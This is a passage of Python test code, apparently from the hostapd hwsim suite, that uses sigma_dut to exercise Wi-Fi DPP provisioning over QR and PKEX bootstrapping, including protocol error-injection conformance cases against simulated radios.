dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) if not resp_pending: dev[1].dpp_qr_code(uri) uri = None res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) t = threading.Thread(target=dpp_resp_conf_mutual, args=(dev[1], conf_id, uri)) t.start() time.sleep(1) cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,10,DPPWaitForConnect,Yes" res = sigma_dut_cmd(cmd, timeout=15) t.join() if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_init_enrollee_psk(dev, apdev): """sigma_dut DPP/QR initiator as Enrollee (PSK)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) params = hostapd.wpa2_params(ssid="DPPNET01", passphrase="ThisIsDppPassphrase") hapd = hostapd.add_ap(apdev[0], params) sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD" res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " conf=sta-psk ssid=%s pass=%s configurator=%d" % (to_hex("DPPNET01"), to_hex("ThisIsDppPassphrase"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not 
succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_init_enrollee_sae(dev, apdev): """sigma_dut DPP/QR initiator as Enrollee (SAE)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) if "SAE" not in dev[0].get_capability("auth_alg"): raise HwsimSkip("SAE not supported") params = hostapd.wpa2_params(ssid="DPPNET01", passphrase="ThisIsDppPassphrase") params['wpa_key_mgmt'] = 'SAE' params["ieee80211w"] = "2" hapd = hostapd.add_ap(apdev[0], params) sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") dev[0].set("sae_groups", "") cmd = "DPP_CONFIGURATOR_ADD" res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " conf=sta-sae ssid=%s pass=%s configurator=%d" % (to_hex("DPPNET01"), to_hex("ThisIsDppPassphrase"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_init_configurator_1(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 1)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1) def test_sigma_dut_dpp_qr_init_configurator_2(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 2)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 2) def test_sigma_dut_dpp_qr_init_configurator_3(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 3)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 3) def test_sigma_dut_dpp_qr_init_configurator_4(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 4)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 4) def test_sigma_dut_dpp_qr_init_configurator_5(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 5)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 5) def test_sigma_dut_dpp_qr_init_configurator_6(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 6)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 6) def test_sigma_dut_dpp_qr_init_configurator_7(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (conf index 7)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 7) def test_sigma_dut_dpp_qr_init_configurator_both(dev, apdev): """sigma_dut DPP/QR initiator as Configurator or Enrollee (conf index 1)""" run_sigma_dut_dpp_qr_init_configurator(dev, 
apdev, 1, "Both") def test_sigma_dut_dpp_qr_init_configurator_neg_freq(dev, apdev): """sigma_dut DPP/QR initiator as Configurator (neg_freq)""" run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, extra='DPPSubsequentChannel,81/11') def run_sigma_dut_dpp_qr_init_configurator(dev, apdev, conf_idx, prov_role="Configurator", extra=None): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,%s,DPPConfIndex,%d,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6" % (prov_role, conf_idx) if extra: cmd += "," + extra res = sigma_dut_cmd(cmd) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def test_sigma_dut_dpp_incompatible_roles_init(dev, apdev): """sigma_dut DPP roles incompatible (Initiator)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6" res = sigma_dut_cmd(cmd) if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def dpp_init_enrollee_mutual(dev, id1, own_id): logger.info("Starting DPP initiator/enrollee in a thread") time.sleep(1) cmd = "DPP_AUTH_INIT peer=%d own=%d role=enrollee" % (id1, own_id) if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") ev = dev.wait_event(["DPP-CONF-RECEIVED", "DPP-NOT-COMPATIBLE"], timeout=5) if ev is None: raise Exception("DPP configuration not completed (Enrollee)") logger.info("DPP initiator/enrollee done") def test_sigma_dut_dpp_incompatible_roles_resp(dev, apdev): """sigma_dut DPP roles incompatible (Responder)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR" res = sigma_dut_cmd(cmd) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = 
res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) t = threading.Thread(target=dpp_init_enrollee_mutual, args=(dev[1], id1, id0)) t.start() cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6" res = sigma_dut_cmd(cmd, timeout=10) t.join() if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def test_sigma_dut_dpp_pkex_init_configurator(dev, apdev): """sigma_dut DPP/PKEX initiator as Configurator""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: id1 = dev[1].dpp_bootstrap_gen(type="pkex") cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1) res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to set PKEX data (responder)") cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6") if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def dpp_init_conf(dev, id1, conf, conf_id, extra): logger.info("Starting DPP initiator/configurator in a thread") cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id1, conf, extra, conf_id) if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5) if ev is None: raise Exception("DPP configuration not completed (Configurator)") logger.info("DPP initiator/configurator done") def test_sigma_dut_ap_dpp_qr(dev, apdev, params): """sigma_dut controlled AP (DPP)""" run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-dpp", "sta-dpp") def test_sigma_dut_ap_dpp_qr_legacy(dev, apdev, params): """sigma_dut controlled AP (legacy)""" run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk", extra="pass=%s" % to_hex("qwertyuiop")) def test_sigma_dut_ap_dpp_qr_legacy_psk(dev, apdev, params): """sigma_dut controlled AP (legacy)""" run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk", extra="psk=%s" % (32*"12")) def run_sigma_dut_ap_dpp_qr(dev, apdev, params, ap_conf, sta_conf, extra=""): check_dpp_capab(dev[0]) logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_qr.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default,program,DPP") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) cmd = "DPP_CONFIGURATOR_ADD" res = dev[0].request(cmd) if "FAIL" in res: raise Exception("Failed 
to add configurator") conf_id = int(res) id1 = dev[0].dpp_qr_code(uri) t = threading.Thread(target=dpp_init_conf, args=(dev[0], id1, ap_conf, conf_id, extra)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6") t.join() if "ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) id1 = dev[1].dpp_bootstrap_gen(chan="81/1", mac=True) uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1) id0b = dev[0].dpp_qr_code(uri1) dev[1].set("dpp_config_processing", "2") cmd = "DPP_LISTEN 2412" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id0b, sta_conf, extra, conf_id) if "OK" not in dev[0].request(cmd): raise Exception("Failed to initiate DPP Authentication") dev[1].wait_connected() sigma_dut_cmd_check("ap_reset_default") finally: dev[1].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_ap_dpp_pkex_responder(dev, apdev, params): """sigma_dut controlled AP as DPP PKEX responder""" check_dpp_capab(dev[0]) logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_pkex_responder.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: run_sigma_dut_ap_dpp_pkex_responder(dev, apdev) finally: stop_sigma_dut(sigma) def dpp_init_conf_pkex(dev, conf_id, check_config=True): logger.info("Starting DPP PKEX initiator/configurator in a thread") time.sleep(1.5) id = dev.dpp_bootstrap_gen(type="pkex") cmd = "DPP_PKEX_ADD own=%d init=1 conf=ap-dpp configurator=%d code=password" % (id, conf_id) res = dev.request(cmd) if "FAIL" in res: raise Exception("Failed to initiate DPP PKEX") if not check_config: return ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5) if ev is None: raise Exception("DPP configuration not completed (Configurator)") logger.info("DPP initiator/configurator done") def run_sigma_dut_ap_dpp_pkex_responder(dev, apdev): sigma_dut_cmd_check("ap_reset_default,program,DPP") cmd = "DPP_CONFIGURATOR_ADD" res = dev[0].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[0], conf_id)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6,DPPWaitForConnect,No", timeout=10) t.join() if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) sigma_dut_cmd_check("ap_reset_default") def test_sigma_dut_dpp_pkex_responder_proto(dev, apdev): """sigma_dut controlled STA as DPP PKEX responder and error case""" check_dpp_capab(dev[0]) sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_pkex_responder_proto(dev, apdev) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_pkex_responder_proto(dev, apdev): cmd = "DPP_CONFIGURATOR_ADD" res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) dev[1].set("dpp_test", "44") t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[1], conf_id, False)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6", timeout=10) t.join() if "BootstrapResult,Timeout" not in res: 
raise Exception("Unexpected result: " + res) def dpp_proto_init(dev, id1): time.sleep(1) logger.info("Starting DPP initiator/configurator in a thread") cmd = "DPP_CONFIGURATOR_ADD" res = dev.request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp configurator=%d" % (id1, conf_id) if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") def test_sigma_dut_dpp_proto_initiator(dev, apdev): """sigma_dut DPP protocol testing - Initiator""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("InvalidValue", "AuthenticationRequest", "WrappedData", "BootstrapResult,OK,AuthResult,Errorsent", None), ("InvalidValue", "AuthenticationConfirm", "WrappedData", "BootstrapResult,OK,AuthResult,Errorsent", None), ("MissingAttribute", "AuthenticationRequest", "InitCapabilities", "BootstrapResult,OK,AuthResult,Errorsent", "Missing or invalid I-capabilities"), ("InvalidValue", "AuthenticationConfirm", "InitAuthTag", "BootstrapResult,OK,AuthResult,Errorsent", "Mismatching Initiator Authenticating Tag"), ("MissingAttribute", "ConfigurationResponse", "EnrolleeNonce", "BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent", "Missing or invalid Enrollee Nonce attribute")] for step, frame, attr, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result, fail): id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10) if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly: " + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_responder(dev, apdev): """sigma_dut DPP protocol testing - Responder""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("MissingAttribute", "AuthenticationResponse", "DPPStatus", "BootstrapResult,OK,AuthResult,Errorsent", "Missing or invalid required DPP Status attribute"), ("MissingAttribute", "ConfigurationRequest", "EnrolleeNonce", "BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent", "Missing or invalid Enrollee Nonce attribute")] for step, frame, attr, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result, fail): res = 
sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10) t.join() if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly:" + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_stop_at_initiator(dev, apdev): """sigma_dut DPP protocol testing - Stop at RX on Initiator""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("AuthenticationResponse", "BootstrapResult,OK,AuthResult,Errorsent", None), ("ConfigurationRequest", "BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent", None)] for frame, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail): id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame)) if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly: " + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, apdev): """sigma_dut DPP protocol testing - Stop at TX on Initiator/Enrollee""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("AuthenticationConfirm", "BootstrapResult,OK,AuthResult,Errorsent,LastFrameReceived,AuthenticationResponse", None)] for frame, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname, debug=True) try: run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame, result, fail): id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to 
start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10) if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly: " + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_stop_at_responder(dev, apdev): """sigma_dut DPP protocol testing - Stop at RX on Responder""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("AuthenticationRequest", "BootstrapResult,OK,AuthResult,Errorsent", None), ("AuthenticationConfirm", "BootstrapResult,OK,AuthResult,Errorsent", None)] for frame, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail): res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10) t.join() if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly:" + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def dpp_proto_init_pkex(dev): time.sleep(1) logger.info("Starting DPP PKEX initiator/configurator in a thread") cmd = "DPP_CONFIGURATOR_ADD" res = dev.request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id = dev.dpp_bootstrap_gen(type="pkex") cmd = "DPP_PKEX_ADD own=%d init=1 conf=sta-dpp configurator=%d code=secret" % (id, conf_id) if "FAIL" in dev.request(cmd): raise Exception("Failed to initiate DPP PKEX") def test_sigma_dut_dpp_proto_initiator_pkex(dev, apdev): """sigma_dut DPP protocol testing - Initiator (PKEX)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("InvalidValue", "PKEXCRRequest", "WrappedData", "BootstrapResult,Errorsent", None), ("MissingAttribute", "PKEXExchangeRequest", "FiniteCyclicGroup", "BootstrapResult,Errorsent", "Missing or invalid Finite Cyclic Group attribute"), ("MissingAttribute", "PKEXCRRequest", "BSKey", "BootstrapResult,Errorsent", "No valid peer bootstrapping key found")] for step, frame, attr, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: 
run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr, result, fail): id1 = dev[1].dpp_bootstrap_gen(type="pkex") cmd = "DPP_PKEX_ADD own=%d code=secret" % (id1) res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to set PKEX data (responder)") cmd = "DPP_LISTEN 2437 role=enrollee" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr)) if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly: " + str(ev)) 